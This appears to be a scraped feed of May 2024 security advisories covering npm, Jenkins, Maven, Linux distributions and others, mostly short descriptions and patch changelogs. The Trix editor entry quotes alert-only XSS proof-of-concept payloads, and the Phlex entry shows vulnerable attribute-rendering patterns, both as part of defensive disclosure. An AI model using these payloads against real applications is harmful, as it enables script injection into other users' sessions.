03.05.2024 23:01:45npm[NPM:GHSA-RCM2-22F3-PQV3] Firebase vulnerable to CSRF attack (low)This vulnerability was a potential CSRF attack. When running the Firebase emulator suite, there is an export endpoint that is used normally to export data from running emulators. If a user was running the emulator and navigated to a malicious website with the exploit on a browser that allowed calls to localhost (i.e. Chrome before v94), the website could exfiltrate emulator data. We recommend upgrading past version 13.6.0 or [commit 068a2b08dc308c7ab4b569617f5fc8821237e3a0](https://github.com/firebase/firebase-tools/commit/068a2b08dc308c7ab4b569617f5fc8821237e3a0).https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RCM2-22F3-PQV3
02.05.2024 15:45:48ubuntu[USN-6762-1] GNU C Library vulnerabilities (critical)Several security issues were fixed in GNU C Library.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6762-1
03.05.2024 20:47:08maven[MAVEN:GHSA-GJ5M-M88J-V7C3] Apache ActiveMQ's default configuration doesn't secure the API web context (high)In Apache ActiveMQ 6.x, the default configuration doesn't secure the API web context (where the Jolokia JMX REST API and the Message REST API are located). It means that anyone can use these layers without any required authentication. Potentially, anyone can interact with the broker (using Jolokia JMX REST API) and/or produce/consume messages or purge/delete destinations (using the Message REST API). To mitigate, users can update the default conf/jetty.xml configuration file to add authentication requirement:
```xml
<bean id="securityConstraintMapping" class="org.eclipse.jetty.security.ConstraintMapping">
  <property name="constraint" ref="securityConstraint" />
  <property name="pathSpec" value="/" />
</bean>
```
Or we encourage users to upgrade to Apache ActiveMQ 6.1.2 where the default configuration has been updated with authentication by default.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-GJ5M-M88J-V7C3
02.05.2024 06:20:32ubuntu[USN-6747-2] Firefox regressionsUSN-6747-1 caused some minor regressions in Firefox.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6747-2
02.05.2024 03:00:00cpan[CPANSA-Email-MIME-2024-4140] Email-MIME vulnerability (high)An excessive memory use issue (CWE-770) exists in Email-MIME, before version 1.954, which can cause denial of service when parsing multipart MIME messages. The patch set (from 2020 and 2024) limits excessive depth and the total number of parts.https://secdb.nttzen.cloud/security-advisory/cpan/CPANSA-Email-MIME-2024-4140
02.05.2024 03:00:00debian[DSA-5676-1] chromiumsecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5676-1
02.05.2024 03:00:00jenkins[JENKINS:SECURITY-3342] Missing permission check in `git-server` (medium)`git-server` 114.v068a_c7cc2574 and earlier does not perform a permission check for read access to a Git repository over SSH. This allows attackers with a previously configured SSH public key but lacking Overall/Read permission to access Git repositories. `git-server` 117.veb_68868fa_027 requires Overall/Read permission to access Git repositories over SSH.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3342
02.05.2024 03:00:00jenkins[JENKINS:SECURITY-3294] Token stored in plain text by `telegram-notifications` (low)`telegram-notifications` 1.4.0 and earlier stores the Telegram Bot token unencrypted in its global configuration file `jenkinsci.plugins.telegrambot.TelegramBotGlobalConfiguration.xml` on the Jenkins controller as part of its configuration. This token can be viewed by users with access to the Jenkins controller file system. As of publication of this advisory, there is no fix.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3294
02.05.2024 03:00:00jenkins[JENKINS:SECURITY-3331] Security protection disabled by `svn-partial-release-mgr` (medium)`svn-partial-release-mgr` 1.0.1 and earlier programmatically sets the link:/doc/book/managing/system-properties/#hudson-model-parametersaction-keepundefinedparameters[Java system property `hudson.model.ParametersAction.keepUndefinedParameters`] whenever a build is triggered from a release tag with the 'Svn-Partial Release Manager' SCM. Doing so disables the fix for link:/security/advisory/2016-05-11/#arbitrary-build-parameters-are-passed-to-build-scripts-as-environment-variables[SECURITY-170 / CVE-2016-3721]. As of publication of this advisory, there is no fix.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3331
02.05.2024 03:00:00jenkins[JENKINS:SECURITY-3341] Multiple sandbox bypass vulnerabilities in `script-security` (high)`script-security` provides a sandbox feature that allows low privileged users to define scripts, including Pipelines, that are generally safe to execute. Calls to code defined inside a sandboxed script are intercepted, and various allowlists are checked to determine whether the call is to be allowed. Multiple sandbox bypass vulnerabilities exist in `script-security` 1335.vf07d9ce377a_e and earlier:
* Crafted constructor bodies that invoke other constructors can be used to construct any subclassable type via implicit casts.
* Sandbox-defined Groovy classes that shadow specific non-sandbox-defined classes can be used to construct any subclassable type.
These vulnerabilities allow attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.
NOTE: These issues are caused by an incomplete fix of link:/security/advisory/2022-10-19/#SECURITY-2824%20(1)[SECURITY-2824].
`script-security` 1336.vf33a_a_9863911 has additional restrictions and sanity checks to ensure that super constructors cannot be constructed without being intercepted by the sandbox:
* Calls to other constructors using `this` are now intercepted by the sandbox.
* Classes in packages that can be shadowed by Groovy-defined classes are no longer ignored by the sandbox when intercepting super constructor calls.https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3341
03.05.2024 20:32:01npm[NPM:GHSA-R4Q9-XX5G-J24P] s3-url-parser vulnerable to Denial of Service via regexes component (moderate)s3-url-parser 1.0.3 is vulnerable to denial of service via the regexes component.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-R4Q9-XX5G-J24P
03.05.2024 01:30:29rubysec[RUBYSEC:PHLEX-2024-32970] Phlex vulnerable to Cross-site Scripting (XSS) via maliciously formed HTML attribute names and values (high)There is a potential cross-site scripting (XSS) vulnerability that can be exploited via maliciously crafted user data. The reason these issues were not detected before is the escapes were working as designed. However, their design didn't take into account just how recklessly permissive browsers are when it comes to executing unsafe JavaScript via HTML attributes.
### Impact
If you render an `<a>` tag with an `href` attribute set to a user-provided link, that link could potentially execute JavaScript when clicked by another user.
```ruby
a(href: user_profile) { "Profile" }
```
If you splat user-provided attributes when rendering any HTML or SVG tag, malicious event attributes could be included in the output, executing JavaScript when the events are triggered by another user.
```ruby
h1(**JSON.parse(user_attributes))
```
### Patches
Patches are [available on RubyGems](https://rubygems.org/gems/phlex) for all minor versions released in the last year.
- [1.10.2](https://rubygems.org/gems/phlex/versions/1.10.2)
- [1.9.3](https://rubygems.org/gems/phlex/versions/1.9.3)
If you are on `main`, it has been patched since [`da8f943`](https://github.com/phlex-ruby/phlex/commit/da8f94342a84cff9d78c98bcc3b3604ee2e577d2)
### Workarounds
Configuring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy) that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline) would effectively prevent this vulnerability from being exploited.
### References
In addition to upgrading to a patched version of Phlex, we strongly recommend configuring a Content Security Policy header that does not allow `unsafe-inline`. Here’s how you can configure a Content Security Policy header in Rails. https://guides.rubyonrails.org/security.html#content-security-policy-header https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:PHLEX-2024-32970
02.05.2024 03:00:00freebsd[FREEBSD:F69415AA-086E-11EF-9F97-A8A1599412C6] chromium -- multiple security fixesChrome Releases reports: This update includes 2 security fixes: [335003891] High CVE-2024-4331: Use after free in Picture In Picture. Reported by Zhenghang Xiao (@Kipreyyy) on 2024-04-16 [333508731] High CVE-2024-4368: Use after free in Dawn. Reported by wgslfuzz on 2024-04-09https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:F69415AA-086E-11EF-9F97-A8A1599412C6
02.05.2024 03:00:00freebsd[FREEBSD:4A1E2BAD-0836-11EF-9FD2-1C697A616631] R -- arbitrary code execution vulnerability (high)HiddenLayer Research reports: Deserialization of untrusted data can occur in the R statistical programming language, enabling a maliciously crafted RDS (R Data Serialization) formatted file or R package to run arbitrary code on an end user's system.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:4A1E2BAD-0836-11EF-9FD2-1C697A616631
08.05.2024 00:03:41go[GO-2024-2824] Malformed DNS message can cause infinite loop in netA malformed DNS message in response to a query can cause the Lookup functions to get stuck in an infinite loop.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2824
07.05.2024 22:36:29ubuntu[USN-6767-1] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6767-1
07.05.2024 22:22:43ubuntu[USN-6766-1] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6766-1
07.05.2024 22:59:42maven[MAVEN:GHSA-P343-9QWP-PQXV] Neo4j Cypher component mishandles IMMUTABLE privileges (moderate)The Cypher component in Neo4j before 5.19.0 mishandles IMMUTABLE privileges.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P343-9QWP-PQXV
07.05.2024 22:59:13maven[MAVEN:GHSA-64CM-3CJ3-67HF] MS Basic Cross-site Scripting vulnerability (moderate)Cross-site scripting (XSS) vulnerability in the search function in MvnRepository MS Basic 2.1.18.3 and earlier.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-64CM-3CJ3-67HF
07.05.2024 20:15:07alpinelinux[ALPINE:CVE-2024-27982] nodejs, nodejs-current vulnerability (medium)[From CVE-2024-27982] The team has identified a critical vulnerability in the http server of the most recent version of Node, where malformed headers can lead to HTTP request smuggling. Specifically, if a space is placed before a content-length header, it is not interpreted correctly, enabling attackers to smuggle in a second request within the body of the first.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-27982
07.05.2024 20:11:00xen[XSA-457] Linux/xen-netback: Memory leak due to missing cleanup function**ISSUE DESCRIPTION**
In netback, xennet_alloc_one_rx_buffer() failed to call the appropriate clean-up function, resulting in a memory leak.
**IMPACT**
A malicious guest userspace process can exhaust memory resources within the guest kernel, potentially leading to a system crash (Denial of Service). It is not known whether it can be triggered remotely.
**VULNERABLE SYSTEMS**
Systems with guests running Linux 5.9 and later with Xen PV network devices are affected.https://secdb.nttzen.cloud/security-advisory/xen/XSA-457
07.05.2024 21:48:11npm[NPM:GHSA-QJQP-XR96-CJ99] Trix Editor Arbitrary Code Execution Vulnerability (moderate)The Trix editor, versions prior to 2.1.1, is vulnerable to arbitrary code execution when copying and pasting content from the web or other documents with markup into the editor. The vulnerability stems from improper sanitization of pasted content, allowing an attacker to embed malicious scripts which are executed within the context of the application.
**Vulnerable Versions**: Up to 2.1.0
**Fixed Version**: 2.1.1
**Vector**:
- **Bug 1**: When copying content manipulated by a script, such as:
```js
document.addEventListener('copy', function(e){
  e.clipboardData.setData('text/html', '<div><noscript><div class="123</noscript>456<img src=1 onerror=alert(1)//"></div></noscript></div>');
  e.preventDefault();
});
```
and pasting into the Trix editor, the script within the content is executed.
- **Bug 2**: Similar execution occurs with content structured as:
```js
document.write(`copy<div data-trix-attachment="{&quot;contentType&quot;:&quot;text/html&quot;,&quot;content&quot;:&quot;&lt;img src=1 onerror=alert(101)&gt;HELLO123&quot;}"></div>me`);
```
### Impact:
An attacker could exploit these vulnerabilities to execute arbitrary JavaScript code within the context of the user's session, potentially leading to unauthorized actions being performed or sensitive information being disclosed.
### Remediation:
**Update Recommendation**: Users should upgrade to Trix editor version 2.1.1 or later, which incorporates proper sanitization of input from copied content.
**CSP Enhancement**: Additionally, enhancing the Content Security Policy (CSP) to disallow inline scripts can significantly mitigate the risk of such vulnerabilities. Set CSP policies such as script-src 'self' to ensure that only scripts hosted on the same origin are executed, and explicitly prohibit inline scripts using script-src-elem.
### References:
- https://github.com/basecamp/trix/releases/tag/v2.1.1
- https://github.com/basecamp/trix/pull/1147
- https://github.com/basecamp/trix/pull/1149
**Credit**: These issues were reported by security researchers [loknop](https://hackerone.com/loknop) and [pinpie](https://hackerone.com/pinpie).https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QJQP-XR96-CJ99
07.05.2024 19:49:01npm[NPM:GHSA-87HQ-Q4GP-9WR4] react-pdf vulnerable to arbitrary JavaScript execution upon opening a malicious PDF with PDF.js (high)### Summary
If PDF.js is used to load a malicious PDF, and PDF.js is configured with `isEvalSupported` set to `true` (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.
### Patches
[This patch](https://github.com/wojtekmaj/react-pdf/commit/671e6eaa2e373e404040c13cc6b668fe39839cad) forces `isEvalSupported` to `false`, removing the attack vector.
### Workarounds
Set `options.isEvalSupported` to `false`, where `options` is `Document` component prop.
### References
- [GHSA-wgrm-67xf-hhpq](https://github.com/mozilla/pdf.js/security/advisories/GHSA-wgrm-67xf-hhpq)
- https://github.com/mozilla/pdf.js/pull/18015
- https://github.com/mozilla/pdf.js/commit/85e64b5c16c9aaef738f421733c12911a441cec6
- https://bugzilla.mozilla.org/show_bug.cgi?id=1893645
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-87HQ-Q4GP-9WR4
07.05.2024 19:51:11maven[MAVEN:GHSA-2X52-8F29-7CJR] Eclipse Dataspace Components vulnerable to OAuth2 client secret disclosure (moderate)In Eclipse Dataspace Components from version 0.2.1 to 0.6.2, in the [EDC Connector component](https://github.com/eclipse-edc/Connector), an attacker might obtain OAuth2 client secrets from the vault. In Eclipse Dataspace Components from version 0.2.1 to 0.6.2, we have identified a security vulnerability in the EDC Connector component ( https://github.com/eclipse-edc/Connector ) regarding the OAuth2-protected data sink feature. When using a custom, OAuth2-protected data sink, the OAuth2-specific data address properties are resolved by the provider data plane. Problematically, the consumer-provided clientSecretKey, which indicates the OAuth2 client secret to retrieve from a secrets vault, is resolved in the context of the provider's vault, not the consumer. This secret's value is then sent to the tokenUrl, also consumer-controlled, as part of an OAuth2 client credentials grant. The returned access token is then sent as a bearer token to the data sink URL. This feature is now disabled entirely, because not all code paths necessary for a successful realization were fully implemented.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2X52-8F29-7CJR
07.05.2024 18:22:10ubuntu[USN-6765-1] Linux kernel (OEM) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6765-1
07.05.2024 17:58:23ubuntu[USN-6764-1] libde265 vulnerabilitylibde265 could be made to crash if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6764-1
07.05.2024 17:44:21ubuntu[USN-6754-2] nghttp2 vulnerability (medium)Several security issues were fixed in nghttp2.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6754-2
07.05.2024 14:21:40ubuntu[USN-6763-1] libvirt vulnerabilitylibvirt could allow unintended access to the virtproxyd service.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6763-1
07.05.2024 13:26:15npm[NPM:GHSA-WGRM-67XF-HHPQ] PDF.js vulnerable to arbitrary JavaScript execution upon opening a malicious PDF (high)### Impact
If pdf.js is used to load a malicious PDF, and PDF.js is configured with `isEvalSupported` set to `true` (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.
### Patches
The patch removes the use of `eval`: https://github.com/mozilla/pdf.js/pull/18015
### Workarounds
Set the option `isEvalSupported` to `false`.
### References
https://bugzilla.mozilla.org/show_bug.cgi?id=1893645
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WGRM-67XF-HHPQ
07.05.2024 03:00:00debian[DSA-5682-1] glib2.0security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5682-1
07.05.2024 03:00:00gentoo[GLSA-202405-18] Xpdf: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in Xpdf, the worst of which could possibly lead to arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-18
07.05.2024 03:00:00gentoo[GLSA-202405-19] xar: Unsafe Extraction (normal)A vulnerability has been discovered in xar, which can lead to privilege escalation.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-19
07.05.2024 03:00:00gentoo[GLSA-202405-20] libjpeg-turbo: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in libjpeg-turbo, the worst of which could lead to arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-20
07.05.2024 03:00:00oraclelinux[ELSA-2024-2549] skopeo security and bug fix update (moderate)[2:1.14.3-2]
- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/5f2b9af)
- Resolves: RHEL-28736
[2:1.14.3-1]
- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/4a2bc3a)
- Resolves: RHEL-28235
[2:1.14.3-0.2]
- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/d0a0f1a)
- Resolves: RHEL-28235
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2549
07.05.2024 03:00:00oraclelinux[ELSA-2024-2550] buildah bug fix update (moderate)[1.33.7-1.0.1]
- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117178]
[2:1.33.7-1]
- update to the latest content of https://github.com/containers/buildah/tree/release-1.33 (https://github.com/containers/buildah/commit/b95e962)
- Resolves: RHEL-28230
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2550
07.05.2024 03:00:00oraclelinux[ELSA-2024-2559] python-jwcrypto security update (moderate)[0.8-5]
- Address potential DoS with high compression ratio
  Resolves: RHEL-28698
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2559
07.05.2024 03:00:00oraclelinux[ELSA-2024-2560] libvirt security and bug fix update (moderate)[10.0.0-6.2.0.1]
- Set SOURCE_DATE_EPOCH from changelog [Orabug: 32019554]
[10.0.0-6.2.el9_4]
- qemu: Fix migration with custom XML (RHEL-32654)
[10.0.0-6.1.el9_4]
- Fix off-by-one error in udevListInterfacesByStatus (CVE-2024-1441, RHEL-25081)
- remote: check for negative array lengths before allocation (CVE-2024-2494)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2560
07.05.2024 03:00:00oraclelinux[ELSA-2024-2564] mod_http2 security update (moderate)[2.0.26-2]
- Resolves: RHEL-31855 - mod_http2: httpd: CONTINUATION frames DoS (CVE-2024-27316)
[2.0.26-1]
- Resolves: RHEL-14691 - mod_http2 rebase to 2.0.26
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2564
07.05.2024 03:00:00oraclelinux[ELSA-2024-2565] libreswan security update (moderate)[4.12-2.0.1]
- Add libreswan-oracle.patch to detect Oracle Linux distro
[4.12-2]
- Fix CVE-2024-2357 (RHEL-32761)
- x509: unpack IPv6 general names based on length (RHEL-32718)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2565
07.05.2024 03:00:00oraclelinux[ELSA-2024-2568] grafana security update (moderate)[9.2.10-16]
- Check OrdID is correct before deleting snapshot
- fix CVE-2024-1313
- fix CVE-2024-1394
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2568
07.05.2024 03:00:00oraclelinux[ELSA-2024-2569] grafana-pcp security update (important)[5.1.1-2]
- fix CVE-2024-1394
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2569
07.05.2024 03:00:00oraclelinux[ELSA-2024-2616] tigervnc security update (important)[1.13.1-8.3]
- Rebuild (z-stream target)
  Resolves: RHEL-30985
  Resolves: RHEL-31015
[1.13.1-8.2]
- Fix crash caused by fix for CVE-2024-31083
  Resolves: RHEL-30985
[1.13.1-8.1]
- Fix CVE-2024-31080 tigervnc: xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents
  Resolves: RHEL-31015
- Fix CVE-2024-31083 tigervnc: xorg-x11-server: Use-after-free in ProcRenderAddGlyphs
  Resolves: RHEL-30985
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2616
07.05.2024 03:00:00oraclelinux[ELSA-2024-2679] libxml2 security update (moderate)[2.9.13-6]
- Fix CVE-2024-25062 (RHEL-29196)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2679
07.05.2024 03:00:00oraclelinux[ELSA-2024-2724] git-lfs security update (important)[3.4.1-2]
- Rebuild with new Golang
- Resolves: RHEL-32570, RHEL-28385, RHEL-28402, RHEL-28432
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2724
07.05.2024 03:00:00oraclelinux[ELSA-2024-2548] podman security and bug fix update (moderate)[4.9.4-3.0.1]
- Add devices on container startup, not on creation
- Backport fast gzip for compression [Orabug: 36420418]
- overlay: Put should ignore ENINVAL for Unmount [Orabug: 36234694]
- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117404]
[4:4.9.4-3]
- rebuild
- Related: RHEL-28234
[4:4.9.4-2]
- bump Epoch to 4 to preserve upgrade path from rhel 8.10
- bump release tag or else it refuses to build
- Resolves: RHEL-28234
[4:4.9.4-1]
- bump Epoch to 4 to preserve upgrade path from rhel 8.10
- Resolves: RHEL-28234
[3:4.9.4-1]
- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/7752c56)
- Resolves: RHEL-28234
[3:4.9.3-3]
- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/5f872ae)
- Resolves: RHEL-28234
[3:4.9.3-2]
- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/06e4598)
- Resolves: RHEL-28636
[2:4.9.3-1]
- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/c82fdc8)
- Resolves: RHEL-28633 RHEL-28629
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2548
06.05.2024 18:40:42 | suse | [SUSE-SU-2024:1151-2] Security update for curl (moderate) | Security update for curl | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1151-2
06.05.2024 16:06:52 | rockylinux | [RLBA-2024:1732] .NET 6.0 bugfix update (none) | An update is available for dotnet6.0. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:1732
06.05.2024 16:06:52 | rockylinux | [RLBA-2024:1733] .NET 8.0 bugfix update (none) | An update is available for dotnet8.0. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:1733
06.05.2024 16:06:52 | rockylinux | [RLBA-2024:1735] .NET 7.0 bugfix update (none) | An update is available for dotnet7.0. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:1735
06.05.2024 16:06:52 | rockylinux | [RLBA-2024:1757] firefox bug fix update (none) | An update is available for firefox. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:1757
06.05.2024 16:06:52 | rockylinux | [RLSA-2024:1719] rear security update (moderate) | An update is available for rear. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1719
06.05.2024 16:06:52 | rockylinux | [RLSA-2024:1751] unbound security update (important) | An update is available for unbound. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1751
06.05.2024 16:06:52 | rockylinux | [RLSA-2024:1781] bind9.16 security update (important) | An update is available for bind9.16. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1781
06.05.2024 16:06:53 | rockylinux | [RLSA-2024:1912] firefox security update (important) | An update is available for firefox. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1912
06.05.2024 16:06:53 | rockylinux | [RLSA-2024:1818] java-1.8.0-openjdk security update (moderate) | An update is available for java-1.8.0-openjdk. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1818
06.05.2024 16:06:53 | rockylinux | [RLSA-2024:1828] java-21-openjdk security update (moderate) | An update is available for java-21-openjdk. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1828
06.05.2024 16:06:53 | rockylinux | [RLSA-2024:1939] thunderbird security update (low) | An update is available for thunderbird. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1939
06.05.2024 16:06:53 | rockylinux | [RLSA-2024:1822] java-11-openjdk security update (moderate) | An update is available for java-11-openjdk. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1822
06.05.2024 16:06:53 | rockylinux | [RLSA-2024:1998] libreswan security update (moderate) | An update is available for libreswan. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1998
06.05.2024 16:06:53 | rockylinux | [RLSA-2024:2037] tigervnc security update (important) | An update is available for tigervnc. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2037
06.05.2024 16:06:51 | rockylinux | [RLBA-2024:1739] sos bugfix and enhancement update (none) | An update is available for sos. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:1739
06.05.2024 16:06:52 | rockylinux | [RLSA-2024:1782] bind and dhcp security update (important) | An update is available for dhcp, bind. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1782
06.05.2024 16:06:52 | rockylinux | [RLSA-2024:1784] gnutls security update (moderate) | An update is available for gnutls. This update affects Rocky Linux 8. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1784
06.05.2024 15:56:18 | suse | [SUSE-SU-2024:1536-1] Security update for flatpak (important) | Security update for flatpak | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1536-1
06.05.2024 15:56:00 | suse | [SUSE-SU-2024:1535-1] Security update for flatpak (important) | Security update for flatpak | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1535-1
06.05.2024 15:55:36 | suse | [SUSE-SU-2024:1534-1] Security update for less (important) | Security update for less | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1534-1
06.05.2024 12:55:29 | suse | [SUSE-SU-2024:1532-1] Security update for SUSE Manager Server 4.3 (important) | Security update for SUSE Manager Server 4.3 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1532-1
06.05.2024 12:52:35 | suse | [SUSE-SU-2024:1530-1] Security update for grafana and mybatis (moderate) | Security update for grafana and mybatis | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1530-1
06.05.2024 12:50:25 | suse | [SUSE-SU-2024:1525-1] Security update for SUSE Manager Salt Bundle (important) | Security update for SUSE Manager Salt Bundle | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1525-1
06.05.2024 12:49:26 | suse | [SUSE-SU-2024:1518-1] Security update for SUSE Manager Salt Bundle (important) | Security update for SUSE Manager Salt Bundle | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1518-1
06.05.2024 12:49:02 | suse | [SUSE-SU-2024:1517-1] Security update for SUSE Manager Salt Bundle (important) | Security update for SUSE Manager Salt Bundle | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1517-1
06.05.2024 12:47:44 | suse | [SUSE-SU-2024:1509-1] Security update for SUSE Manager Client Tools (important) | Security update for SUSE Manager Client Tools | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1509-1
06.05.2024 12:46:36 | suse | [SUSE-SU-2024:1508-1] Security update for SUSE Manager Client Tools (moderate) | Security update for SUSE Manager Client Tools | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1508-1
06.05.2024 12:46:03 | suse | [SUSE-SU-2024:1507-1] Security update for SUSE Manager Server 4.3 (important) | Security update for SUSE Manager Server 4.3 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1507-1
